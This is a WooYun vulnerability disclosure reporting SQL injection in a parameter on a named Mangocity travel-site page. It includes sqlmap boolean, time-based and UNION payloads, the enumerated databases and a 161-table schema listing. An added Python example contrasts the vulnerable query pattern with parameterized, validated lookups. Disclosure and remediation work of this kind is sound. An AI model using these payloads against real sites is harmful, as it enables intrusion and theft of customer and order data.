
Vulnerability summary

Defect ID: wooyun-2015-0136847

Title: A 芒果网 (Mangocity) site has an SQL injection vulnerability, part two

Vendor: 芒果网

Author: Xmyth_夏洛克

Submitted: 2015-08-25 16:26

Fixed: 2015-08-30 16:28

Published: 2015-08-30 16:28

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-08-25: details sent to the vendor, awaiting the vendor's response
2015-08-30: the vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

23333

Details:

Injectable page:
http://bj.mangocity.com/visa/article.jsp?jspmaker_act_id=101

[Image: 存在注入页面.png (the injectable page)]


Appending a single quote to the parameter produces a database error.

[Image: 报错.png (the error message)]


Running the URL through sqlmap enumerates three databases.

[Image: 255C.tmp.jpg (sqlmap output)]


Proof:

161 tables

[Image: 161个表.png (161 tables)]


Parameter: jspmaker_act_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jspmaker_act_id=101 AND 1503=1503
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=101 AND (SELECT * FROM (SELECT(SLEEP(5)))kUwL)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: jspmaker_act_id=-8503 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x56706f5471597a4c7a53,0x71786a7a71),NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] test
[*] ut7
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: jspmaker_act_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jspmaker_act_id=101 AND 1503=1503
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=101 AND (SELECT * FROM (SELECT(SLEEP(5)))kUwL)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: jspmaker_act_id=-8503 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x56706f5471597a4c7a53,0x71786a7a71),NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: ut7
[161 tables]
+---------------------------+
| account_info |
| call_post_set |
| comments |
| comments_reply |
| crm_info |
| dev_data_fields |
| dev_data_table |
| dev_input_field |
| dev_page_input |
| dev_template |
| fm_parameter |
| fm_parameter_set |
| fm_receivables_payables |
| g_accessory |
| g_fm_accounting |
| g_fm_advertisement |
| g_fm_inspect |
| g_fm_person_brokerage |
| g_sign_state |
| gather_document |
| gl_season_destination |
| gl_strategy |
| gl_strategy_page_block |
| hc_train_info |
| high_custom |
| hk_airlines_info |
| hk_flight_info |
| hk_models |
| hotel_basic_info |
| hotel_photo |
| hotel_price_info |
| hotel_room_info |
| income_expenses_single |
| insurance_company |
| insurance_info |
| jd_facility |
| jd_group_info |
| jd_hotel_info |
| jd_photo |
| jd_room_info |
| l_photo |
| member_log |
| mobile_web_page_block |
| monthly_balance |
| oa_appliance |
| oa_leave |
| oa_notice |
| oa_purchase |
| oa_purchase_log |
| oa_report_annul |
| oa_report_annul_log |
| oa_supplier |
| oa_userget |
| old_order |
| online_ask |
| optional_order |
| order_basic_info |
| order_checkseat |
| order_doc |
| order_file |
| order_finance_statistics |
| order_gathering |
| order_insurance |
| order_invoice |
| order_other_cost |
| order_outteam |
| order_pay |
| order_pay_log |
| order_pledge |
| order_reality_data |
| order_refund |
| order_remark |
| order_supplier |
| order_visit |
| order_visit_log |
| os_accessory_file |
| os_city |
| os_company |
| os_country |
| os_data_source |
| os_fileup |
| os_function |
| os_g_destination |
| os_g_trip_type |
| os_help |
| os_log |
| os_login_user |
| os_module |
| os_order |
| os_photo |
| os_province |
| os_suggest |
| os_system |
| pay_order |
| personal_quick |
| phone_to_callcenter |
| qc_car_info |
| qc_group_info |
| reg_member |
| reg_tables |
| remit_info |
| reply_question |
| scenic_info |
| scenic_photo |
| self_expense |
| set_of_book |
| sign_contract |
| sms_date |
| sms_log |
| sms_port |
| sort_table |
| strategy_article |
| strategy_aspect_info |
| strategy_destination_info |
| strategy_photo |
| strategy_web_column |
| system_seting |
| system_variable |
| t_ad |
| t_admin |
| t_article |
| t_base_trans |
| t_category |
| t_commen |
| t_gather |
| t_gatherhis |
| t_keywords |
| t_label |
| t_role |
| t_source |
| t_special |
| t_template |
| t_vote |
| t_voteitem |
| t_web_seting |
| tour_aspect |
| tour_basic_info |
| tour_basic_info_order |
| tour_destination |
| tour_price_info |
| tour_price_info_order |
| tour_schedule_info |
| tour_shoping |
| tour_stard_info |
| tour_time |
| trip_type |
| user_department |
| user_msg |
| visa_basic_info |
| visa_reservation |
| visa_test |
| visitor_list |
| web_article |
| web_column |
| web_custom |
| web_email_subscriptions |
| web_error_page |
| web_friendly_link |
| web_page_block |
| web_set_tour_aspect |
| web_set_tour_destination |
+---------------------------+

Fix:

Filter the input.
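The one-word fix above ("filter") written out, as an added example that is not code from the original report or from 芒果网's article.jsp. The article table, its rows and the SQLite back end are constructed stand-ins (the report only gives the parameter name jspmaker_act_id and that the real DBMS is MySQL); the false-condition probe "101 AND 1503=1504" is a constructed complement of the report's own "101 AND 1503=1503" payload. The example shows why the vulnerable pattern leaks a boolean oracle, and that parameterization plus strict integer validation closes it:

```python
import re
import sqlite3


# Constructed stand-in for the article lookup behind article.jsp; the real
# schema is not part of the report, only the parameter name and the DBMS are.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(100, "visa article 100"), (101, "visa article 101"), (102, "visa article 102")],
    )
    return conn


def lookup_vulnerable(conn, act_id):
    """The pattern the report implies: the raw request parameter is spliced into
    the SQL text, so 'jspmaker_act_id=101 AND 1503=1503' becomes part of the
    WHERE clause and the database evaluates the attacker-supplied condition."""
    sql = "SELECT title FROM article WHERE id = " + act_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, act_id):
    """Bound parameter: the value is sent as data and is never parsed as SQL."""
    rows = conn.execute("SELECT title FROM article WHERE id = ?", (act_id,))
    return [row[0] for row in rows]


# Only a plain decimal integer is an acceptable activity id.
ACT_ID_PATTERN = re.compile(r"^[0-9]{1,9}$")


def parse_act_id(raw):
    """The report's 'filter' step: an int for a well-formed id, None otherwise."""
    if raw is None or not ACT_ID_PATTERN.match(raw):
        return None
    return int(raw)


def lookup_hardened(conn, raw):
    """Validation plus parameterization: malformed input is rejected before any
    query runs, and valid input can only ever be an integer comparison."""
    act_id = parse_act_id(raw)
    if act_id is None:
        return []
    return lookup_parameterized(conn, act_id)


if __name__ == "__main__":
    db = make_db()
    true_probe = "101 AND 1503=1503"   # payload quoted in the report (condition true)
    false_probe = "101 AND 1503=1504"  # constructed complement (condition false)
    # Vulnerable: the response differs between the two probes, which is exactly
    # the oracle that sqlmap's boolean-based blind technique relies on.
    print(lookup_vulnerable(db, true_probe), lookup_vulnerable(db, false_probe))
    # Parameterized: neither probe equals any id, so there is no oracle.
    print(lookup_parameterized(db, true_probe), lookup_parameterized(db, false_probe))
    # Hardened: both probes are rejected outright; a normal id still works.
    print(lookup_hardened(db, true_probe), lookup_hardened(db, "101"))
```

In a JSP application the equivalent of lookup_parameterized is a JDBC PreparedStatement with setInt, and the validation layer belongs in the servlet or filter before any database access; the detection signal for the vulnerable pattern is that a true and a false condition appended to the same id produce different page bodies.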

Copyright notice: when reposting, please credit Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: no impact (ignored by the vendor)

Ignored at: 2015-08-30 16:28

Vendor reply:

Vulnerability rank: 15 (WooYun rating)

Latest status:

None yet